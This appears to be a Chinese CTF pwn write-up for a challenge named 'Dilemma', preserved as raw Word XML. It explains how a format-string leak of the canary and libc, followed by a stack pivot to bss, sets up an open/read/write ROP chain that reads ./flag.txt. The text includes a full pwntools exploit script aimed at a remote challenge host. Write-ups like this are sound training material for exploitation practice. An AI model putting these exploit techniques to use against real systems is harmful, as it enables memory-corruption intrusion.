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155CA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Dilemma</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A668C4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2590800" cy="1104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FD8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64位 Canary nx保护</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45719781">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="11830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BA22">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3460750" cy="3702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E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 func_1 、func_0两个函数 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B6887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75100" cy="4629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01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Func_1 格式化字符串漏洞来泄露canary和libc ，func1第二个输入可以随便输，输完后退出func1，输入2进入func0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DB5C9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79900" cy="105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2C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禁用了execve 所以我们考虑打orw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689611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Func0有0x100字节大小的输入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3336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Func_0 直接栈迁移打orw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358CED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先迁到bss段 ，在把./flag.txt字符串写到bss段上面去,再使用0x100字节大小的输入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B12A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最后覆盖返回地址打orw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED3D7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EXP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297DAB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pwn import*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733B23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 = process('./pwn')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5116CF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= remote('101.200.155.151',12500)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6CB5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elf = ELF('./pwn')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C05A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libc = ELF('./libc.so.6')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3725D8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context(arch='amd64',log_level='debug',os='linux')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563E50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pop_rdi = 0x000000000040119a </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CD87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 = 0x000000000040101a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263DF4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bss =  0x404000 + 0x900</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D9DF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pop_rsi_r15 = 0x000000000040119c </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02579B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p.recvuntil("where are you go?\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529CB0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p.sendline("1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE7A5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p.recvuntil("Enter you password:\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EF79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payload = b'%39$p%11$p'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DBBB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#gdb.attach(p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2C5F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p.sendline(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC661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p.recvuntil("0x")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3930A0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libc_start = int(p.recv(12),16) - 128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D90B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libc_base = libc_start- libc.sym['__libc_start_main']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511D2B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p.recvuntil("0x")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774922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again = 0x4012BA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06519A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canary = int(p.recv(16),16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664BEE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p.recvuntil("I will check your password:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF848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p.send("a"*8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E951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p.recvuntil("where are you go?\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFFAA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p.sendline("2")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503FE6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p.recvuntil("We have a lot to talk about\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C43FD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payload = b'a'*0x28 + p64(canary) + p64(bss+0x30) + p64(0x4011C9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696B9A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p.send(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0477B5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p.recvuntil("a"*0x28)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E8A3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pop_rdx_r12 = 0x000000000011f2e7 + libc_base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C26D1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 = libc_base + libc.sym['open']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236FEE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 = libc_base + libc.sym['read']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCC5E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 = libc_base + libc.sym['write']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C97A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payload2 = b'./flag.txt' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AEB2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payload2 = payload2.ljust(0x28,b'\x00') + p64(canary) + p64(0) + p64(pop_rdi) + p64(bss) + p64(pop_rsi_r15) + p64(0) + p64</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(0) + p64(open)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FD2C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payload2 += p64(pop_rdi) + p64(3) + p64(pop_rsi_r15) + p64(bss+0x200) + p64(0) + p64(pop_rdx_r12) + p64(0x50) + p64(0) + p64(read)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290BF2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payload2 += p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(bss+0x200) + p64(0) + p64(pop_rdx_r12) + p64(0x50) + p64(0) + p64(write) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285D47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print(hex(len(payload2)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419205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#gdb.attach(p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9D2A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p.send(payload2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644592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p.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3420E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19700" cy="584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6AF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B4966"/>
    <w:rsid w:val="0DA94960"/>
    <w:rsid w:val="0E3A0776"/>
    <w:rsid w:val="444B3D92"/>
    <w:rsid w:val="68C136D7"/>
    <w:rsid w:val="7324350D"/>
    <w:rsid w:val="7BCB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2025-05-16T01:15:53Z</dcterms:created>
  <dc:creator>35172</dc:creator>
  <cp:lastModifiedBy>a宝</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-16T01:26:11Z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eyJoZGlkIjoiNzQxMTk5ZTcyZThiNmEzYmQyNjMwNWUxYzUxY2U4ZTMiLCJ1c2VySWQiOiIxMjA0OTQyMzk0In0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>3B05FD3BC053432EBC9BB2416C73F2C6_12</vt:lpwstr>
  </property>
</Properties>
</file>